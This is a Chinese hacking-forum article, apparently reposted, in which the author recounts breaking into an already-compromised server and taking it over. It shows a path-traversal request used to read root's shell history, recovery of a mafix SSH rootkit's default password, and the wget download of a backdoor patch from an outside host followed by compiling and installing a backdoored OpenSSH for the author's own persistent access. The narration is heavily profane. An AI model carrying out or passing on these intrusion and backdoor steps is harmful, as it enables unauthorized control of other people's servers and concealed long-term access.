热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

一次检测Rootkit的肉鸡

发布时间:2012-12-11 13:03文章来源:dis9文章作者:秩名 点击次数:
摘要:Yaseng 发了个包含给我 ROOT权限运行与HTTPD 如下图 傻逼 草拟吗的嫩B 什么J8管理员 ROOT权限的HTTPD? 这不明摆着找日吗? 草拟吗B的傻逼 打算破HASH 没CPU GUP 好吧 这傻逼货 继续看 NAMP扫了下 我了个擦 貌似有个 傻逼 黑客装个后门 啃跌了 什么年代了 还...

Yaseng 发了个包含给我 ROOT权限运行与HTTPD 如下图



傻逼 草拟吗的嫩B 什么J8管理员 ROOT权限的HTTPD? 这不明摆着找日吗? 草拟吗B的傻逼

打算破HASH 没CPU GUP

好吧 这傻逼货 继续看 NAMP扫了下 我了个擦 貌似有个傻逼黑客装个后门

啃跌了 什么年代了 还用sshd v1 你特么不是丢人吗?? 链接测试

  1. brk<~> $ ssh root@xxoo -1 # 22端口的SSH
  2. Protocol major versions differ: 1 vs. 2
  3. brk<~> $ ssh root@xxoo -p 2010 -1 # 2012端口的SSH 低级版本 怀疑后门
  4. root@xxoo’s password:

估计是傻逼mafix SSH backdoor 下载了微观下
http://lucky.fuzzexp.org/file/r00tk1t/mafix.tar_shit.gz

看到SSHDIR=/lib/libsh.so 包含读了下 果然是这个傻逼后门

下面确定了 找密码吧~~

首先看ROOT的日志 source : http://fuzzexp.org/check_rk.html

  1. GET /sc8/photodownload?filepath=../../../../../../../../../../../root/.bash_history%00.html HTTP/1.1

读了下 找不到 估计被-c了

分析ROOTKIT的源代码 看看密码如何处理的

  1. brk<~/Desktop/ddrk> $ head setup
  2. #!/bin/bash
  3.  
  4. ##########define variables##########
  5. DEFPASS=123456
  6. DEFPORT=43958
  7. BASEDIR=`pwd`
  8. SSHDIR=/lib/libsh.so
  9. HOMEDIR=/usr/lib/libsh

变量是 DEFPASS
查找

  1. brk<~/Desktop/ddrk> $ cat setup | grep DEFPASS
  2. DEFPASS=123456
  3. echo “No Password Specified, using default – $DEFPASS”
  4. echo -n $DEFPASS|md5sum > /etc/sh.conf
  5. brk<~/Desktop/ddrk> $

村在了 /etc/sh.conf MD5加密 啃跌啊 读一下 果然出来了

你妈个BB 接着MD5 解密 。。。

成功登录

接下来 删除黑客的后门 留我自己的后门 如下 安装OPENSSH的吧。。 source : http://fuzzexp.org/check_rk.html

  1. [root@SH-crew:/root]# ssh -v
  2. OpenSSH_4.3p2, OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
  3. usage: ssh [-1246AaCfgkMNnqsTtVvXxY] [-b bind_address] [-c cipher_spec]
  4. [-D [bind_address:]port] [-e escape_char] [-F configfile]
  5. [-i identity_file] [-L [bind_address:]port:host:hostport]
  6. [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
  7. [-R [bind_address:]port:host:hostport] [-S ctl_path]
  8. [-w tunnel:tunnel] [user@]hostname [command]
  9. [root@SH-crew:/root]#

下载源代码。。

  1. [root@SH-crew:/root]# cd /tmp/
  2. [root@SH-crew:/tmp]# mkdir …
  3. [root@SH-crew:/tmp]# cd …
  4. [root@SH-crew:/tmp/...]# wget http://64studio.hivelocity.net/apt/pool/main/o/openssh/openssh_4.3p2.orig.tar.gz
  5. [root@SH-crew:/tmp/...]# tar xf openssh_4.3p2.orig.tar.gz
  6. [root@SH-crew:/tmp/...]# cd openssh-4.3p2/
  7. [root@SH-crew:/tmp/.../openssh-4.3p2]# wget http://lucky.fuzzexp.org/file/r00tk1t/openssh-5.5p1.patch/sshbd5.5p1.diff
  8. [root@SH-crew:/tmp/.../openssh-4.3p2]# patch < sshbd5.5p1.diff
  9. patching file auth.c
  10. Hunk #1 succeeded at 243 (offset -28 lines).
  11. patching file auth-passwd.c
  12. Hunk #1 succeeded at 113 (offset -9 lines).
  13. patching file canohost.c
  14. Hunk #1 succeeded at 60 (offset -18 lines).
  15. patching file includes.h
  16. Hunk #1 succeeded at 211 (offset 39 lines).
  17. patching file sshconnect2.c
  18. Hunk #1 succeeded at 736 with fuzz 2 (offset -80 lines).
  19. patching file sshlogin.c
  20. Hunk #1 succeeded at 112 (offset -21 lines).
  21. [root@SH-crew:/tmp/.../openssh-4.3p2]#

接下来编辑了下密码 和SSH登录登出的记录文件 编译

  1. [root@SH-crew:/tmp/.../openssh-4.3p2]# ./configure –prefix=/usr –sysconfdir=/etc/ssh
  2. [root@SH-crew:/tmp/.../openssh-4.3p2]# make && make install

重启 退出 登录SSH

  1. [root@SH-crew:/tmp/.../openssh-4.3p2]# nano /etc/ssh/sshd_config
  2. [root@SH-crew:/tmp/.../openssh-4.3p2]# nano /etc/ssh/ssh_config
  3. [root@SH-crew:/tmp/.../openssh-4.3p2]# /etc/init.d/sshd restart
  4. [root@SH-crew:/tmp/.../openssh-4.3p2]exit

然后登录 22 输入后门密码Helenv5

傻逼黑客的后门删除了 哈哈哈

  1. [root@viewjpkc libsh]# chmod -R 000 *
  2. [root@viewjpkc libsh.so]# chmod -R 000 *

吧端口封了

  1. [root@viewjpkc libsh]# iptables -I INPUT -j DROP -p tcp –dport 2010
  2. [root@viewjpkc libsh]# iptables-save

测试链接

  1. brk<~/files/ssh> $ nc -vv xxxxxxxxxxx 2010
  2. Connection to xxoo 2010 port [tcp/search] succeeded!
  3. SSH-1.5-2.0.13
  4. ^C
  5. brk<~/files/ssh> $ nc -vv xxxxxx 2010

链接不了了

吧MOD删除了 别问我咋知道的 傻逼RK一般只用这个 source : http://fuzzexp.org/check_rk.html

  1. [root@viewjpkc libsh]# modprobe -r ehci-hcd

最后 发张图。。。。

标签分类:

上一篇:MSSQL高级注入 命令提权大全
下一篇:LMHASH: Windows 共享安全